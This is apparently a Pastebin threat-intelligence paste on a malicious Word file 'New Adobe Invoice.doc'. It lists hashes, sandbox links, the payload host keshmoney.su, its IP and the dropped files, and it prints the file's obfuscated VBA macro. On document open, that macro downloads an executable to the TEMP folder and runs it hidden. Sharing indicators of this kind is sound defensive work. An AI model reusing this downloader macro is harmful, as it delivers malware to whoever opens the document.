API tools faq
paste
Advertisement
Snakelabs

f8b521fb58d02915b9748374f653ba70

Snakelabs
Oct 6th, 2014
630
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.61 KB | None | 0 0
raw download clone embed print report
  1. New Adobe Invoice.doc
  2. MD5: 12a589d6d306f4e888847f127b8ab5ee
  3. VT: https://www.virustotal.com/en/file/55f06751b22dd5c17bcce7ab9e9da59dcabd3840ab089fe8b800c8aebbf1f3f5/analysis/
  4.  
  5. Macro download from url: hxxp://keshmoney[.]su/adobe[.]php
  6. IP: 94.102.52.186
  7. https://www.projecthoneypot.org/ip_94.102.52.186
  8. https://www.virustotal.com/en/ip-address/94.102.52.186/information/
  9.  
  10. Dropped: 1.exe
  11. MD5: f8b521fb58d02915b9748374f653ba70
  12. VT: https://www.virustotal.com/en/file/ac5ff0806a382593bac3f22ab4038dfbe0a9efaaa39dcd5207ab7917b012a67a/analysis/1412584016/
  13.  
  14. @Malwr (Welcome Back): https://malwr.com/analysis/OWI0YzEzNGU0ZWIwNDQxYmJlMWJmOWViZTgyNzRkNzE/
  15.  
  16. Dropped files:
  17. variometer.dll - 6a2ab204068c4eb3b02810384afe58b0
  18. https://malwr.com/analysis/ZTMyZjE1NjNmZDkxNDZkOThiYTAxMjNkYjgyN2NlZGE/#
  19. https://www.virustotal.com/en/file/52355804db4fd57c21cb8c79b148616c6cc889685e0e5986b7c050554bfa298d/analysis/1412685680/
  20.  
  21. variometer.h - 54884c54da9b136c9a5f6bfab2fad0f7
  22. https://www.virustotal.com/en/file/5b3d1e4b214cfd34dd69903bb790aab7ec42e6b799f8ed695a3a6a46f1e76b1c/analysis/
  23. https://malwr.com/analysis/MGQwM2Q2ZWI1MWMxNDc5Njk1N2UxYjEzM2Q5MmQxMTE/
  24.  
  25. ~~~~~~~~~~~~~~~MACRO~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  26.  
  27. Attribute VB_Name = "ThisDocument"
  28. Attribute VB_Base = "1Normal.ThisDocument"
  29. Attribute VB_GlobalNameSpace = False
  30. Attribute VB_Creatable = False
  31. Attribute VB_PredeclaredId = True
  32. Attribute VB_Exposed = True
  33. Attribute VB_TemplateDerived = True
  34. Attribute VB_Customizable = True
  35. ByVal GeBiKVj35 As String, _
  36. ByVal LeMCQnPgP As Long, _
  37. ByVal SOIrsyJYk As Long) As Long
  38.  
  39. Sub SiGa4rtiongi()
  40. C0rlinge34
  41. End Sub
  42. Sub Auto_Open()
  43. SiGa4rtiongi
  44. End Sub
  45. Sub AutoOpen()
  46. Auto_Open
  47. End Sub
  48.  
  49. Sub G4wringro(asd As String)
  50. Dim p0tngou3yor As String
  51.  
  52. p0tngou3yor = Environ("TEMP")
  53. Hdfr45iuoyr 0, asd, p0tngou3yor & "\" & "rsrs.exe", 0, 0
  54.  
  55. Shell p0tngou3yor & "\" & "rsrs.exe", vbHide
  56. End Sub
  57.  
  58. Sub asdsadadasdasdsadasdasdsadasdasdasdsadasdasdasdasdasdsadasdsasdassad()
  59.  
  60. End Sub
  61. Sub C0rlinge34()
  62. On Error Resume Next
  63. Dim sendie45uis As String
  64. Dim a As String
  65. Dim aa As String
  66. Dim jadsadasjdajsdjasdjas As String
  67. Dim asdjasdjas9ddnasudiasbdiasud As String: Dim asadjasdasdasdasd As String
  68. sendie45uis = Environ("TEMP")
  69. Kill sendie45uis & "\rsrs.exe"
  70. Dim Sgwamyu64 As String
  71. Sgwamyu64 = "http:" & "//" & "keshm" & "oney" & ".su/" & "ad" & "obe" & ".php"
  72.  
  73. Call G4wringro(Replace(Sgwamyu64, " ", ""))
  74.  
  75. End Sub
  76.  
  77. Sub GLsapqirr()
  78. SiGa4rtiongi
  79. End Sub
  80. Sub FTBgUhEPj()
  81. SiGa4rtiongi
  82. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!